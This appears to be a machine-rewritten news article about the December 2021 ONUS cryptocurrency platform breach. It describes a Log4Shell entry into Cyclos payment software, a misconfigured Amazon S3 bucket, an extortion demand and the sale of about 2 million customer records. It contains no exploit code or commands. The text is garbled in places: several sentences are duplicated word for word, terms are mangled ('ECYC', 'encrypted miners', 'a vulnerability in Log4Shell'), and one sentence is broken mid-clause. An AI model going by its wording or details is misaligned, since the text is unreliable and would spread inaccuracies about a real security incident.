ONUS, one of Vietnam’s largest crypto trading platforms, was recently found to have suffered a cyber attack on its payment system running a vulnerable version of Log4j.
ONUS, one of the largest cryptocurrency platforms in Vietnam, was hacked a few days ago.
The ONUS cybersecurity incident started with a Log4Shell vulnerability in the company’s payment software provided by Cyclos, but later escalated due to misconfiguration and mis-authorization in AWS S3.
The attackers took advantage of a vulnerability in Cyclos’ software before the vendor could notify customers and provide a patch.
ONUS patched the vulnerability as soon as it was alerted by Cyclos, but it was too late.
As a result, the ECYC data, personal information, password hashes, and other information of 2 million ONUS users were exposed.
A threat group extorted $5 million from ONUS and threatened to release customer data if ONUS did not comply, but after refusing to pay the ransom, the threat group sold the data of nearly 2 million ONUS customers on forums.
Vulnerable log4j version used in payment software
On December 9, 2021, a PoC exploit for a vulnerability in Log4Shell (CVE-2021-44228) was leaked to GitHub. It then caught the attention of attackers, who began to scan the Internet for vulnerable servers in large numbers.
It appears that between December 11 and 13, 2021, a vulnerability in Log4Shell on the ONUS Cyclos server was successfully exploited to plant a backdoor for persistent access.
Cyclos is a provider of point-of-sale (POS) and payment software solutions and, like many vendors, was using a vulnerable version of log4j in its software.
Cyclos issued an advisory on the 13th informing ONUS to apply the patch, but it seems to be too late.
Despite the fact that ONUS had patched Cyclos, there was still enough time for the threat group to exfiltrate sensitive databases during its release period.
These databases contained approximately 2 million customer records, including E-KYC (Know Your Customer) data, personal information, and hashed passwords.
E-KYC workflows adopted by banks and fintech companies usually require some form of identification documents or certificates from customers, and also use “video selfies” for automated verification.
The vulnerability in Log4Shell existed in a sandbox server that was used for “programming purposes only”, but a misconfiguration in the system allowed an attacker to gain further access to the sensitive data storage location (Amazon S3 bucket) where production data was stored. However, a misconfiguration in the system allowed the attacker to gain further access to the sensitive data storage location (Amazon S3 bucket) where the production data was stored.
ONUS then received an extortion demand for $5 million, which it allegedly refused.
Instead, the company chose to expose the attack to its customers through a private Facebook group.
Chien Tran, CEO of ONUS
As a company that puts safety first, we are committed to providing our customers with transparent and honest business operations.
That’s why, after careful consideration, the right thing to do now is to inform the entire ONUS community about this incident
Amazon S3 bucket misconfiguration
This hack itself goes a bit further than just the Log4j issue.
The Log4j exploit may have been the attacker’s entry point, but improper access controls on the ONUS Amazon S3 bucket allowed the attacker unwarranted access.
Hackers took advantage of a vulnerability in a series of libraries on the ONUS system to break into a sandbox server (for programming purposes only)
However, due to a configuration issue, the server It contains information that allows the attacker to access our data storage system (Amazon S3) and steal critical data. This poses a risk of exposing the personal information of many users.
Customer information obtained by the threat actor is as follows.
- Name
- Email and phone number
- Address
- KYC information
- Encrypted password
- Transaction history
- Other encrypted information
CyStack, a cybersecurity company that provided services to ONUS, conducted a thorough investigation and released its findings on the attack mechanism and the backdoor planted by the attackers.
Approximately 2 million customer records are up for sale
By December 25, it was revealed that the threat group, having failed to obtain a ransom from ONUS, had put customer data up for sale on a data breach marketplace.
The threat group comments that they own a copy of the 395 ONUS database tables that contain customers’ personal information and hashed passwords.
We have also seen samples of this kind of data published in the forum.
This sample also included images of customer ID cards, passports, and selfie videos submitted by customers obtained through the KYC process.
This is also an opportunity for us to review ourselves and upgrade our system to ensure the safety of our users and to make it even more perfect, especially during the transition from VNDC to ONUS.
CyStack’s proposal to ONUS was to patch the Log4Shell vulnerability in Cyclos as instructed by the vendor, disable the leaked AWS credentials, properly configure AWS access permissions, block all public access to sensitive S3 buckets blocking all public access to sensitive S3 buckets, and to add additional restrictions.
The log4j vulnerability has been exploited by all kinds of threat actors, from state-sponsored hackers to ransomware gangs, to inject encrypted miners into vulnerable systems.
Also, Conti, a ransomware gang, is trying to exploit vulnerable VMWare vCenter servers.
Log4j users should immediately upgrade to the latest version 2.17.1 (Java 8 compatible), which was released yesterday. Note that backported versions 2.12.4 (Java 7) and 2.3.2 (Java 6) containing this fix will be released shortly.
Comments